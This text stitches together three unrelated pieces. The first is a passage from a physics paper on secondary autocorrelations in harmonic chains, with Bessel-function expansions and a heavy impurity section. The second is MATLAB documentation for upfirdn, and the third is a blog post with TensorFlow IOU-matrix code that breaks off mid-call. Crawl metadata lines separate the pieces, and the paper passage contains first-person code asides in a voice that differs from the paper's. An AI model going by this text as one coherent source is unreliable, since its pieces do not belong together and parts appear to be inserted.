$$D_i(t)=\frac{1}{\sum_{j=1}^{N}A_{ij}^4}\sum_{j=1}^{N}A_{ij}^4\cos\omega_j t, \qquad (17)$$

or, taking into account the expression (4) for normal mode frequencies,

$$D_i(t)=\frac{1}{\sum_{j=1}^{N}A_{ij}^4}\sum_{j=1}^{N}A_{ij}^4\cos\Big[2\omega t\sin\Big(\frac{\pi j}{2(N+1)}\Big)\Big]. \qquad (18)$$

Recognizing here the generating function for Bessel functions

$$\cos(x\sin\theta)=J_0(x)+2\sum_{k=1}^{\infty}J_{2k}(x)\cos(2k\theta), \qquad (19)$$

$D_i(t)$ can be written as a superposition of Bessel functions

$$D_i(t)=J_0(2\omega t)+\sum_{k=1}^{\infty}S_{ik}J_{2k}(2\omega t), \qquad (20)$$

with coefficients

$$S_{ik}=\frac{2}{\sum_{j=1}^{N}A_{ij}^4}\sum_{j=1}^{N}A_{ij}^4\cos\Big(\frac{\pi jk}{N+1}\Big). \qquad (21)$$

A simple analysis of this expression shows that given $i$, the coefficients are nonzero only for five sets of $k$:

$$S_{ik}=\begin{cases}2, & k=2(N+1)s\\ -4/3, & k=2(N+1)s-2i\\ -4/3, & k=2(N+1)(s-1)+2i\\ 1/3, & k=2(N+1)s-4i\\ 1/3, & k=2(N+1)(s-1)+4i\\ 0, & \text{otherwise}\end{cases} \qquad (22)$$

where $s=1,2,3,\ldots$ Note that this expression is invariant under the transformation $i\to N+1-i$, reflecting the symmetry of the left and right sides of the chain. One can observe that for large $N$ and $i$ not too close to the end or to the middle of the chain the coefficients are nonzero only for large indices $k$. For instance, for the chain with $N=101$ and the particle $i=20$, coefficients are nonzero only for $k\ge 40$. As a result, for not too large $t$ in the expression (20), the dominating contribution comes from the first term $J_0(2\omega t)$, while the corrections given by the sum involve Bessel functions of large orders which are negligibly small for a significant time interval Stegun ().

The above consideration not only justifies the equality $C_i(t)\approx D_i(t)$ for $t<\tau_i$, but also accounts for a curious non-monotonic dependence of $\tau_i$ on the tagged particle index $i$, which we noticed empirically in Fig. 2. For example, according to (22), for $N=101$ and particles $i=20,30,40$ the minimal indices $k$ for which $S_{ik}$ takes nonzero values are $k=40$, $60$ and $44$, respectively. Then keeping only the leading and first correction terms in the exact expression (20), one gets

$$\begin{aligned} D_{20}(t)&=J_0(2\omega t)-\tfrac{4}{3}J_{80}(2\omega t),\\ D_{30}(t)&=J_0(2\omega t)-\tfrac{4}{3}J_{120}(2\omega t),\\ D_{40}(t)&=J_0(2\omega t)+\tfrac{1}{3}J_{88}(2\omega t).\end{aligned} \qquad (23)$$
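These selection rules are easy to confirm numerically. The sketch below (ours; scipy assumed, $\omega=1$, and it relies on Eqs. (21)-(23) as reconstructed above) computes the exact coefficients $S_{ik}$ for $N=101$, $i=20$, and compares the full Bessel expansion with the two-term approximation:

```python
import numpy as np
from scipy.special import jv   # Bessel J_n(x) = jv(n, x)

N, i = 101, 20
j = np.arange(1, N + 1)
A2 = (2.0 / (N + 1)) * np.sin(np.pi * i * j / (N + 1)) ** 2   # A_ij^2
A4 = A2 ** 2

def S(k):                                     # Eq. (21)
    return 2.0 * np.sum(A4 * np.cos(np.pi * j * k / (N + 1))) / np.sum(A4)

ks = np.arange(1, 2 * (N + 1) + 1)
nonzero = [k for k in ks if abs(S(k)) > 1e-9]
print(nonzero[:4], [round(S(k), 3) for k in nonzero[:4]])
# -> [40, 80, 124, 164] with values near [-4/3, 1/3, 1/3, -4/3], cf. Eq. (22)

t = np.linspace(0, 30, 301)
D_exact = jv(0, 2 * t) + sum(S(k) * jv(2 * k, 2 * t) for k in nonzero)
D_approx = jv(0, 2 * t) - (4.0 / 3.0) * jv(80, 2 * t)         # Eq. (23), i = 20
print(np.max(np.abs(D_exact - D_approx)))     # negligible at these times
```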
One can verify that these approximations describe the initial deviation of $D_i(t)$ from $J_0(2\omega t)$ very well indeed (Fig. 3 shows this for one of these particles). Since for small arguments the Bessel function $J_n(x)$ decreases with order $n$, it is clear from (23) that the correction terms for particles $i=20$ and $i=40$ involve Bessel functions of smaller orders, and thus become essential at earlier times than for particle $i=30$.

If one applies a similar analysis to the primary correlations $C_i(t)$, Eq. (14), one gets a familiar approximate relation for the left side of the chain Vig (); Lee (); PS ()

$$C_i(t)=J_0(2\omega t)-J_{4i}(2\omega t). \qquad (24)$$

Here, in contrast to the corresponding relations (23) for $D_i(t)$, the order of the second Bessel function, which describes effects of finite size, increases monotonically (linearly) with particle index $i$, and so does the crossover time $\tau_i^*$.

In order to study the dependence of the characteristic time $\tau_i$, during which $C_i(t)\approx D_i(t)$, on $i$ in a more quantitative way, let us consider the function

$$\delta_i(t)=C_i(t)-D_i(t), \qquad (25)$$

which is zero when the two correlations coincide for $t<\tau_i$ and fluctuates at longer times. For a given $i$, let us define $\tau_i$ somewhat arbitrarily as the time at which $\delta_i(t)$ reaches its first local minimum or maximum; see Fig. 4(a). Similarly, we can define the crossover time $\tau_i^*$ as the moment when the function

$$\Delta_i(t)=C_i(t)-C_\infty(t) \qquad (26)$$

has its first local extremum, recalling that $C_\infty(t)=J_0(2\omega t)$ is the correlation in an infinite system. Using these definitions, we record observations of $\tau_i$ and $\tau_i^*$ for $N=101$ in Fig. 4(b), as a function of particle index $i$. Whereas $\tau_i^*$ increases linearly as we approach the central particle, $\tau_i$ coincides with $\tau_i^*$ for smaller $i$ and linearly decreases closer to the middle of the chain. As we already know, the primary and secondary correlations coincide for the middle particle $i_0$, so $\delta_{i_0}(t)$ is identically zero and $\tau_{i_0}$ diverges here. Somewhat unexpectedly, we find that $\tau_i$ also diverges, i.e. $\delta_i(t)$ vanishes identically, for $i=(N+1)/3$ (and of course the symmetric case $i=2(N+1)/3$). Therefore it would appear that $\tau_i$ diverges whenever it changes from increasing to decreasing, or vice versa. Further calculations for different $N$ show that in general the exact equality $C_i(t)=D_i(t)$ holds for particles with indices

$$i_0=\frac{N+1}{2},\qquad i_1=\frac{N+1}{3},\qquad i_2=\frac{2(N+1)}{3}, \qquad (27)$$

provided of course that these expressions are integers. For $N=101$ there are three such particles ($i_1=34$, $i_0=51$, $i_2=68$); depending on the divisibility of $N+1$, other chains have two such particles, or none.

Let us show that this phenomenon is readily accounted for with Eqs. (20)-(22) for the secondary correlation $D_i(t)$. First, from inspecting (22) one might observe that for $i<(N+1)/3$ the minimal $k$ for which $S_{ik}$ is non-zero is $k=2i$ and comes from the set $k=2(N+1)(s-1)+2i$ with $s=1$. This yields the approximation

$$D_i(t)=J_0(2\omega t)-\tfrac{4}{3}J_{4i}(2\omega t), \qquad (28)$$

which we already used for $i=20$ and $i=30$ in (23). It differs from the corresponding approximation (24) for $C_i(t)$ only by the factor $4/3$ in the second term. Then, from (28) and (24), the difference functions defined above by relations (25) and (26) take the form

$$\delta_i(t)=\tfrac{1}{3}J_{4i}(2\omega t),\qquad \Delta_i(t)=-J_{4i}(2\omega t). \qquad (29)$$

Since these two functions have local extrema at the same time, by definition we have $\tau_i=\tau_i^*$. Furthermore, since the position of the first maximum of the Bessel function $J_n(x)$ increases approximately linearly with $n$ Watson (), Eq. (29) explains the equality of the characteristic times and their linear increase for $i<(N+1)/3$ in Fig. 4(b).

As $i$ gets larger still ($i>(N+1)/3$), one observes from (22) that the minimal $k$ for which $S_{ik}$ is nonzero is $k=2(N+1)-4i$ and comes from the set $k=2(N+1)s-4i$ with $s=1$. In this case for $D_i(t)$, instead of (28), we have another approximation

$$D_i(t)=J_0(2\omega t)+\tfrac{1}{3}J_\alpha(2\omega t),\qquad \alpha=4(N+1)-8i, \qquad (30)$$

which we already used for $i=40$ in (23). Since the primary correlation is still given by (24), the difference function in this case reads

$$\delta_i(t)=-\tfrac{1}{3}J_\alpha(2\omega t)-J_{4i}(2\omega t)\approx-\tfrac{1}{3}J_\alpha(2\omega t). \qquad (31)$$
The position of its first extremum increases approximately linearly with the order $\alpha$ [Watson] and, as follows from (30), $\alpha$ decreases linearly with $i$. This explains the behavior of the coincidence time for larger $i$ in Fig. 4(b). The transition from a positive to a negative slope occurs at the index for which $2(N+1)-4i$ (the minimal value of the set $k=2(N+1)s-4i$) becomes less than or equal to $2i$ (the minimal value of the set $k=2(N+1)(s-1)+2i$). The equality $2(N+1)-4i=2i$ gives $i=(N+1)/3$, which is consistent with our empirical findings (27).

The exact equality $D_i(t)=C_i(t)$ for the indices given by (27) can be readily verified using the following expression for the primary correlations

$$C_i(t)=J_0(2\omega t)+\sum_{k=1}^{\infty}T_{ik}J_{2k}(2\omega t),\qquad(32)$$

with coefficients

$$T_{ik}=2\sum_{j=1}^{N}A_{ij}^2\cos\Bigl(\frac{\pi jk}{N+1}\Bigr).\qquad(33)$$

These relations are similar to (20) and (21) for $D_i(t)$ and can be derived in a similar way [PS]. For the indices $i$ given by (27), one can verify directly from (33) and (21) that $T_{ik}=S_{ik}$ for any $k$. Then the comparison of (32) and (20) gives, for those values of $i$, the exact equality $C_i(t)=D_i(t)$.

## IV Heavy impurity problem

So far we have discussed finite harmonic systems of similar particles. If a tagged particle is heavier than the rest, it turns out that the equality of primary and secondary correlations, $C(t)$ and $D(t)$, does not hold. Though structurally similar ($D(t)$ looks like a coarse-grained copy of $C(t)$), the two correlations are quite distinct on any time scale; see Fig. 5. In particular, the approximation of exponential relaxation, while good for the primary correlation, is noticeably worse for the secondary one. Another observation is that both correlations, being apparently random on a short time scale, show on a larger scale a noisy yet periodically repeating pattern; see the bottom plot in Fig. 5. This feature, absent in systems of equal-mass particles, is made all the more obvious when considering higher order correlation functions, defined recursively as

$$C_{k+1}(t)=\frac{\langle C_k(\tau)\,C_k(\tau+t)\rangle_\tau}{\langle C_k^2(\tau)\rangle_\tau},\qquad(34)$$

with the new notations $C_1(t)$ for the primary correlation and $C_2(t)=D(t)$ for the secondary one. (In this section we use the notation with a subscript referring to the correlation order, rather than to the index of a particle.) For the heavy impurity problem one finds that as the order $k$ increases the apparent randomness of the correlations quickly diminishes, and higher correlations converge to the normal mode with the lowest nonzero eigenfrequency $\Omega_1$:

$$C_k(t)\to\cos(\Omega_1 t);\qquad(35)$$

see Fig. 6. Below we outline a theoretical framework underlying these empirical observations.

Consider a cyclic chain of $2N$ particles of mass $m$ and an impurity of mass $M$ described by the Hamiltonian

$$H=\frac{P^2}{2M}+\sum_{i=1}^{2N}\frac{p_i^2}{2m}+\frac{m\omega^2}{2}\sum_{i=1}^{2N-1}(q_i-q_{i+1})^2+\frac{m\omega^2}{2}\bigl[(Q-q_1)^2+(Q-q_{2N})^2\bigr],\qquad(36)$$

where $P$ and $Q$ are the momentum and coordinate of the impurity. Using a diagonalization method similar to that described in the Appendix (see [Cukier] for details), one can show that the normalized momentum correlation function for the impurity is again an almost periodic function, now of the form

$$C(t)\equiv C_1(t)=\sum_{j=0,1,3,\dots}^{2N-1}A_j\cos\Omega_j t.\qquad(37)$$

The amplitudes in this expression are given by

$$A_j=\Bigl\{1+\sum_{i=1,3,\dots}^{2N-1}\frac{\epsilon_i^2}{(\Omega_j^2-\omega_i^2)^2}\Bigr\}^{-1},\qquad(38)$$

where

$$\omega_i=2\omega\sin\frac{i\pi}{2(2N+1)},\qquad \epsilon_i=-2\mu^{1/2}\omega^2\Bigl(\frac{2}{2N+1}\Bigr)^{1/2}\sin\frac{i\pi}{2N+1},\qquad(39)$$

and $\mu=m/M$ is the mass ratio. Due to the system's symmetry only the modes with zero and odd indices contribute to the superposition (37). Their frequencies $\Omega_j$ (for $j\ge1$) cannot be expressed in closed form and must be evaluated as roots of the secular equation [Cukier]

$$G(z)=z^2-2\mu\omega^2-\sum_{i=1,3,\dots}^{2N-1}\frac{\epsilon_i^2}{z^2-\omega_i^2}=0.\qquad(40)$$

This transcendental equation has solutions $\Omega_j$, $j=0,1,3,\dots,2N-1$. It can be verified that one solution is the zero frequency $\Omega_0=0$, which reflects the translational invariance of the system. The remaining nonzero roots must be evaluated numerically.
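As a side note, the recursive definition (34) is straightforward to approximate numerically once any correlation function has been sampled on a grid. The sketch below is my own illustration, not the authors' procedure: it replaces the time average over $\tau$ by a mean over a finite window, and the lag range is an arbitrary choice.

    import numpy as np

    def next_order(Ck, max_lag):
        # Discrete approximation of Eq. (34):
        # C_{k+1}(t) = <C_k(tau) C_k(tau+t)>_tau / <C_k(tau)^2>_tau,
        # with the tau-average replaced by a finite-window mean.
        n = len(Ck)
        num = np.array([np.mean(Ck[:n - L] * Ck[L:]) for L in range(max_lag)])
        return num / np.mean(Ck**2)

    # Hypothetical usage: sample C_1(t) from Eq. (37) on a fine grid after
    # solving (40) for the eigenfrequencies, then iterate to get C_2, C_3, ...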
With the set of eigenfrequencies found, one may calculate the amplitudes with (38) and evaluate the primary correlation $C(t)$ by carrying out the summation in (37). Then, using (10), for the secondary correlation one obtains

$$D(t)=C_2(t)=c_2\Bigl\{A_0^2+\frac{1}{2}\sum_{j=1,3,\dots}^{2N-1}A_j^2\cos\Omega_j t\Bigr\}\qquad(41)$$

with normalization coefficient

$$c_2=\Bigl(A_0^2+\frac{1}{2}\sum_{j=1,3,\dots}^{2N-1}A_j^2\Bigr)^{-1}.\qquad(42)$$

Fig. 5 presents $C(t)$ and $D(t)$ calculated with Eqs. (37) and (41). In a similar manner, one can obtain from (34) the expression for correlations of order $k$,

$$C_k(t)=c_k\Bigl\{A_0^{\alpha_k}+\sum_{j=1,3,\dots}^{2N-1}\Bigl(\frac{A_j}{\sqrt{2}}\Bigr)^{\alpha_k}\cos\Omega_j t\Bigr\}\qquad(43)$$

with powers $\alpha_k=2^{k-1}$ and normalization coefficient

$$c_k=\Bigl\{A_0^{\alpha_k}+\sum_{j=1,3,\dots}^{2N-1}\Bigl(\frac{A_j}{\sqrt{2}}\Bigr)^{\alpha_k}\Bigr\}^{-1}.\qquad(44)$$

While expression (43) is a superposition of many modes, one can observe that for larger $k$ the main contribution comes from the mode with eigenfrequency $\Omega_1$, so that $C_k(t)\to\cos\Omega_1 t$. This can be accounted for by noticing that the sequence of coefficients in (43) has its maximum element at the $j=1$ term and decreases monotonically thereafter. For the primary and secondary correlations, which involve the amplitudes $A_j$ and $A_j^2/2$ respectively, a small difference between the leading coefficients hardly plays a role. But for higher-order correlations the maximum of the set (still at $j=1$) may be orders of magnitude greater than any other element. As a result, the superposition in (43) is increasingly dominated by the term with $j=1$, and higher-order correlations quickly converge to the first normal mode, $C_k(t)\to\cos\Omega_1 t$. For systems of same-mass particles the set of normal mode amplitudes, given by the second equation in (14), is a periodic function of the mode index and has no single maximum. In this case the reduction of higher-order correlations to a dominating normal mode does not occur.

## V Conclusion

Temporal autocorrelation functions are often evaluated in the thermodynamic limit, in which case they typically decrease in a regular (non-random) fashion, either monotonically or non-monotonically. In finite systems, autocorrelation functions themselves become noisy at long time scales; this reflects recurrences in the dynamics of the tagged variable due to reflections of sound off the boundaries. In this paper we introduced and studied some properties of the secondary correlation function $D(t)$, defined as an autocorrelation function of the primary correlation function $C(t)$. If it exists, the characteristic time of decay of $D(t)$ determines the time scale of a typical "period" of $C(t)$, which in turn may be associated with the typical recurrence time of the tagged variable. These "typical" times may, however, be ill-defined mathematically (as is indeed the case for the harmonic systems discussed above), so, to be more precise, the secondary correlation can be described as a function characterizing a distribution of recurrence times: for a given $t$, a larger value of $D(t)$ corresponds to a greater probability (density) that the tagged variable will return to an assigned value in a time of about $t$. Comparing the secondary correlation with the mean recurrence time, Eq. (6), the latter being more prevalent in the literature, one notices that the two functions give complementary descriptions: while the mean recurrence time characterizes the number of returns to a given assigned value, the secondary correlation gives the distribution of return times regardless of the assigned value.

One interesting result is the equality $D_i(t)=C_i(t)$ for systems of same-mass particles. The equality is either exact for all $t$ or a very good approximation over an initial interval whose duration depends on the tagged particle's position non-monotonically.
Although its derivation is quite simple, the equality of primary and secondary correlations may be a remarkable property, especially considering that the former is defined over the ensemble and the latter with time averaging. We restricted the discussion to the simplest case of one-dimensional harmonic systems, but an extension to higher dimensions appears to be straightforward. Whether the equality, or perhaps some other relation between primary and secondary correlations, still holds for nonlinear systems is an open question.

Like the primary correlation, on long time scales the secondary correlation also develops a noisy tail (see the insets in Fig. 3), which itself can be characterized by a correlation of higher order. In turn, this new tertiary function has the same structure as the secondary and primary functions, exhibiting regular decay over shorter times and fluctuating over longer times. Thus one can construct an infinite hierarchy of higher order correlations whose order-scaling properties are also interesting to study. Of course, for the particular cases when the equality holds exactly for all $t$, e.g. a harmonic chain with periodic boundary conditions, all higher order correlations are identical.

We have studied higher correlations in the context of the heavy impurity problem. Here the equality of primary and secondary correlations does not hold, and the primary correlation displays a distinctive non-random pattern on long time scales, which becomes even more visible in correlations of higher orders. Indeed, the sequence of higher-order correlations converges to the lowest normal mode.

###### Acknowledgements.

We thank S. Shea and V. Dudnik for discussions and the anonymous referee for important suggestions.

## Appendix

In this appendix we outline the derivation of expressions (3) and (14) for the momentum correlation functions of the $i$-th particle in a harmonic chain with fixed ends, described by the Hamiltonian (1). Using the normal mode transformation

$$q_i=\frac{1}{\sqrt{m}}\sum_{j=1}^{N}A_{ij}Q_j,\qquad p_i=\sqrt{m}\sum_{j=1}^{N}A_{ij}P_j,$$

with coefficients $A_{ij}$ given by (14), and taking into account the orthogonality relation $\sum_i A_{ij}A_{ij'}=\delta_{jj'}$, the Hamiltonian (1) is diagonalized into the form of uncoupled normal modes

$$H=\frac{1}{2}\sum_{j=1}^{N}\bigl\{P_j^2+\omega_j^2Q_j^2\bigr\}$$

with frequencies $\omega_j$ given by (4). The normal modes are governed by the Hamiltonian equations

$$\dot{P}_j=-\frac{\partial H}{\partial Q_j}=-\omega_j^2Q_j,\qquad \dot{Q}_j=\frac{\partial H}{\partial P_j}=P_j,$$

and evolve as

$$P_j(t)=P_j(0)\cos\omega_j t-\omega_jQ_j(0)\sin\omega_j t,$$
$$Q_j(t)=Q_j(0)\cos\omega_j t+\omega_j^{-1}P_j(0)\sin\omega_j t.$$

Assuming that initially the system is in equilibrium with the canonical distribution function $\propto e^{-\beta H}$, the correlations of the normal modes' initial values are $\langle P_{j'}(0)P_j(0)\rangle=\delta_{jj'}\beta^{-1}$ and $\langle Q_{j'}(0)P_j(0)\rangle=0$. Then

$$\langle P_{j'}(0)P_j(t)\rangle=\langle P_{j'}(0)P_j(0)\rangle\cos\omega_j t=\delta_{jj'}\beta^{-1}\cos\omega_j t,$$

and the momentum correlation of the $i$-th particle is

$$\langle p_i(0)p_i(t)\rangle=m\sum_{j,j'=1}^{N}A_{ij}A_{ij'}\langle P_{j'}(0)P_j(t)\rangle=\frac{m}{\beta}\sum_{j=1}^{N}A_{ij}^2\cos\omega_j t.$$

Division of this expression by $\langle p_i^2\rangle=m/\beta$ gives the normalized correlation function (14). In the case of the middle particle $i=(N+1)/2$ (assuming $N$ is odd), $A_{ij}^2=2/(N+1)$ for odd $j$ and zero otherwise. In this case, one obtains the normalized correlation function in the form (3). The correlation (15) corresponding to the periodic boundary condition can be derived in a similar way. For the extension to the heavy impurity problem see e.g. [Cukier].

## References

• (1) R. Zwanzig, Nonequilibrium Statistical Mechanics, Oxford University Press, New York (2001), Ch. 10.
• (2) P. Mazur and E. Montroll, J. Math. Phys. 1, 70-84 (1960).
• (3) R. I. Cukier and P. Mazur, Physica 53, 157 (1971).
• (4) M. Kac, Am. J. Math. 65, 609 (1943).
• (5) J. O. Vigfusson, Physica A 98, 215 (1979).
• (6) F. Jin, T. Neuhaus, K. Michielsen, S. Miyashita, M. A.
Novotny, M. I. Katsnelson, and H. De Raedt, New J. Phys. 15, 033009 (2013). • (7) V. A. Benderskii and E. I. Kats, JETP 116, 1 (2013). • (8) J. Florencio and M. H. Lee, Phys. Rev. A 31, 3231 (1985). • (9) P. Hänggi and G.-L. Ingold, Chaos 15, 026105 (2005). • (10) A. V. Plyukhin and J. Schofield, Phys. Rev. E 64, 041103 (2001). • (11) H.-X. Zhou and R. Zwanzig, J. Phys. Chem. A 106, 7562 (2002). • (12) J. Rosa and M. W. Beims, Phys. Rev. E 78, 031126 (2008). • (13) Q. Wei, S. T. Smith, and R. Onofrio, Phys. Rev. E 79, 031128 (2009). • (14) H. Hasegawa, Phys. Rev. E 83, 021104 (2011); 84, 011145 (2011). • (15) A. Carcaterra and A. Akay, Phys. Rev. E 84, 011121 (2011). • (16) M. Abramowitz and I. A. Stegun, Handbook of Mathematical Functions, Dover, New York (1972). • (17) G. N. Watson, A Treatise on the Theory of Bessel Functions, Cambridge University Press, Cambridge (1995), p. 521.
2020-08-08 00:17:34
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8466914296150208, "perplexity": 717.2199416347411}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439737233.51/warc/CC-MAIN-20200807231820-20200808021820-00207.warc.gz"}
https://de.mathworks.com/help/signal/ref/upfirdn.html
# upfirdn

Upsample, apply FIR filter, and downsample

## Description

yout = upfirdn(xin,h) filters the input signal xin using an FIR filter with impulse response h. No upsampling or downsampling is implemented with this syntax.

yout = upfirdn(xin,h,p) specifies the integer upsampling factor p.

yout = upfirdn(xin,h,p,q) specifies the integer downsampling factor q.

## Examples

Change the sample rate of a signal by a rational conversion factor from the DAT rate of 48 kHz to the CD sample rate of 44.1 kHz. Use the rat function to find the numerator L and the denominator M of the rational factor.

Fdat = 48e3;
Fcd = 44.1e3;
[L,M] = rat(Fcd/Fdat)
L = 147
M = 160

Generate a 1.5 kHz sinusoid sampled at $f_{\mathrm{DAT}}$ for 0.25 seconds. Plot the first millisecond of the signal.

t = 0:1/Fdat:0.25-1/Fdat;
x = sin(2*pi*1.5e3*t);
stem(t,x)
xlim([0 0.001])
hold on

Design an antialiasing lowpass filter using a Kaiser window. Set the filter band edges as 90% and 110% of the cutoff frequency, $(f_{\mathrm{DAT}}/2)\times\min(1/L,1/M)$. Specify a passband ripple of 5 dB and a stopband attenuation of 40 dB. Set the passband gain to L.

f = (Fdat/2)*min(1/L,1/M);
d = designfilt('lowpassfir', ...
    'PassbandFrequency',0.9*f,'StopbandFrequency',1.1*f, ...
    'PassbandRipple',5,'StopbandAttenuation',40, ...
    'DesignMethod','kaiserwin','SampleRate',48e3);
h = L*tf(d);

Use upfirdn with the filter h to resample the sinusoid. Compute and compensate for the delay introduced by the filter. Generate the corresponding resampled time vector.

y = upfirdn(x,h,L,M);
delay = floor(((filtord(d)-1)/2-(L-1))/L);
y = y(delay+1:end);
t_res = (0:(length(y)-1))/Fcd;

Overlay the resampled signal on the plot.

stem(t_res,y,'*')
legend('Original','Resampled','Location','southeast')
hold off

## Input Arguments

Input signal, specified as a vector or matrix. If xin is a vector, then it represents a single signal. If xin is a matrix, then each column is filtered independently. See Tips for more details.

Filter impulse response, specified as a vector or matrix. If h is a vector, then it represents one FIR filter. If h is a matrix, then each column is a separate FIR impulse response sequence. See Tips for more details.

Upsampling factor, specified as a positive integer.

Downsampling factor, specified as a positive integer.

## Output Arguments

Output signal, returned as a vector or matrix. Each column of yout has length ceil(((length(xin)-1)*p+length(h))/q).

Note: Since upfirdn performs convolution and rate changing, the yout signals have a different length than xin. The number of rows of yout is approximately p/q times the number of rows of xin.

## Tips

The valid combinations of the sizes of xin and h are:

1. xin is a vector and h is a vector. The inputs are one filter and one signal, so the function convolves xin with h. The output signal yout is a row vector if xin is a row vector; otherwise, yout is a column vector.

2. xin is a matrix and h is a vector. The inputs are one filter and many signals, so the function convolves h with each column of xin. The resulting yout is a matrix with the same number of columns as xin.

3. xin is a vector and h is a matrix. The inputs are multiple filters and one signal, so the function convolves each column of h with xin. The resulting yout is a matrix with the same number of columns as h.

4. xin is a matrix and h is a matrix, both with the same number of columns.
The inputs are multiple filters and multiple signals, so the function convolves corresponding columns of xin and h. The resulting yout is a matrix with the same number of columns as xin and h.

## Algorithms

upfirdn uses a polyphase interpolation structure. The number of multiply-add operations in the polyphase structure is approximately (LhLx − pLx)/q, where Lh and Lx are the lengths of h(n) and x(n), respectively. For long signals, this formula is often exact.

upfirdn performs a cascade of three operations:

1. Upsample the input data in the matrix xin by a factor of the integer p (inserting zeros)
2. FIR filter the upsampled signal data with the impulse response sequence given in the vector or matrix h
3. Downsample the result by a factor of the integer q (throwing away samples)

The FIR filter is usually a lowpass filter, which you must design using another function such as firpm or fir1.

Note: The function resample performs an FIR design using firls, followed by rate changing implemented with upfirdn.

## References

[1] Crochiere, R. E. "A General Program to Perform Sampling Rate Conversion of Data by Rational Ratios." Programs for Digital Signal Processing (Digital Signal Processing Committee of the IEEE Acoustics, Speech, and Signal Processing Society, eds.). New York: IEEE Press, 1979, Programs 8.2-1–8.2-7.

[2] Crochiere, R. E., and Lawrence R. Rabiner. Multirate Digital Signal Processing. Englewood Cliffs, NJ: Prentice-Hall, 1983.
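For readers outside MATLAB, the documented three-step cascade is easy to reproduce. The following NumPy sketch is a reference implementation of the cascade as described above (not MathWorks' polyphase code) and checks the stated output-length formula; for efficiency one would instead use scipy.signal.upfirdn, which implements the polyphase structure.

    import numpy as np

    def upfirdn_ref(x, h, p=1, q=1):
        # 1. upsample by p: insert p-1 zeros between samples
        xu = np.zeros((len(x) - 1) * p + 1)
        xu[::p] = x
        # 2. FIR filter with impulse response h (full convolution)
        y = np.convolve(xu, h)
        # 3. downsample by q: keep every q-th sample
        return y[::q]

    x = np.random.randn(50)
    h = np.ones(8) / 8.0
    y = upfirdn_ref(x, h, p=3, q=2)
    # documented length: ceil(((length(xin)-1)*p + length(h)) / q)
    assert len(y) == int(np.ceil(((len(x) - 1) * 3 + len(h)) / 2))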
2021-05-18 08:36:23
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 2, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8217846155166626, "perplexity": 2942.1750385802343}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243989756.81/warc/CC-MAIN-20210518063944-20210518093944-00559.warc.gz"}
https://chadrick-kwag.net/vectorized-calculatation-of-iou-and-removing-duplicate-boxes/
When doing object detection, it is very hard to avoid calculating IOU at some point. Although this could be done iteratively, one pair at a time, with a Python for loop when there are only a few boxes, the computation time increases significantly as the number of boxes grows. One way to speed things up is to calculate the IOU matrix in a vectorized manner, in other words, operating on whole arrays at once.

Here is how to calculate the IOU matrix using TensorFlow. The code will also output the index pairs where the boxes have an IOU value above a given threshold (in this case, 0.8). When getting these index pairs, if we simply use tf.where with a condition, the result would also include pairs of identical indices, which is obvious because every box has an IOU of 1.0 with itself. But we don't want to count these cases, so a few more lines of code remove them.

BTW, the code below assumes that the coordinates of the boxes are values relative to the image width and height, so they are in the range 0~1. The code (written against the TF1-style placeholder/session API) is as below:

import tensorflow as tf

def get_iou_matrix_tf(box_arr1, box_arr2):
    x11, y11, x12, y12 = tf.split(box_arr1, 4, axis=1)
    x21, y21, x22, y22 = tf.split(box_arr2, 4, axis=1)
    # pairwise intersection-rectangle corners
    xA = tf.maximum(x11, tf.transpose(x21))
    yA = tf.maximum(y11, tf.transpose(y21))
    xB = tf.minimum(x12, tf.transpose(x22))
    yB = tf.minimum(y12, tf.transpose(y22))
    interArea = tf.maximum((xB - xA + 1e-9), 0) * tf.maximum((yB - yA + 1e-9), 0)
    boxAArea = (x12 - x11 + 1e-9) * (y12 - y11 + 1e-9)
    boxBArea = (x22 - x21 + 1e-9) * (y22 - y21 + 1e-9)
    iou = interArea / (boxAArea + tf.transpose(boxBArea) - interArea)
    return iou

def calculate_iou_matrix_tf(boxarr, threshold=0.8):
    # or can use gpu, e.g. "/device:GPU:0"
    device_str = "/device:CPU:0"
    with tf.device(device_str):
        box_list_ph = tf.placeholder(tf.float32, shape=(None, 4))
        iou_matrix = get_iou_matrix_tf(box_list_ph, box_list_ph)
        high_iou_coords = tf.where(iou_matrix > threshold)
        print(high_iou_coords)
    with tf.device("/device:CPU:0"):
        # drop (i, i) pairs: every box has IOU 1.0 with itself
        first_coords, second_coords = tf.split(high_iou_coords, 2, axis=1)
        iscoord_same = first_coords - second_coords
        tresult = tf.where(tf.not_equal(iscoord_same, 0))
        sel_indices, _ = tf.split(tresult, 2, axis=1)
        sel_indices = tf.squeeze(sel_indices)
        valid_high_iou_coords = tf.gather(high_iou_coords, sel_indices)
    with tf.Session() as sess:
        _iou_matrix, _valid_high_iou_coords = sess.run(
            [iou_matrix, valid_high_iou_coords],
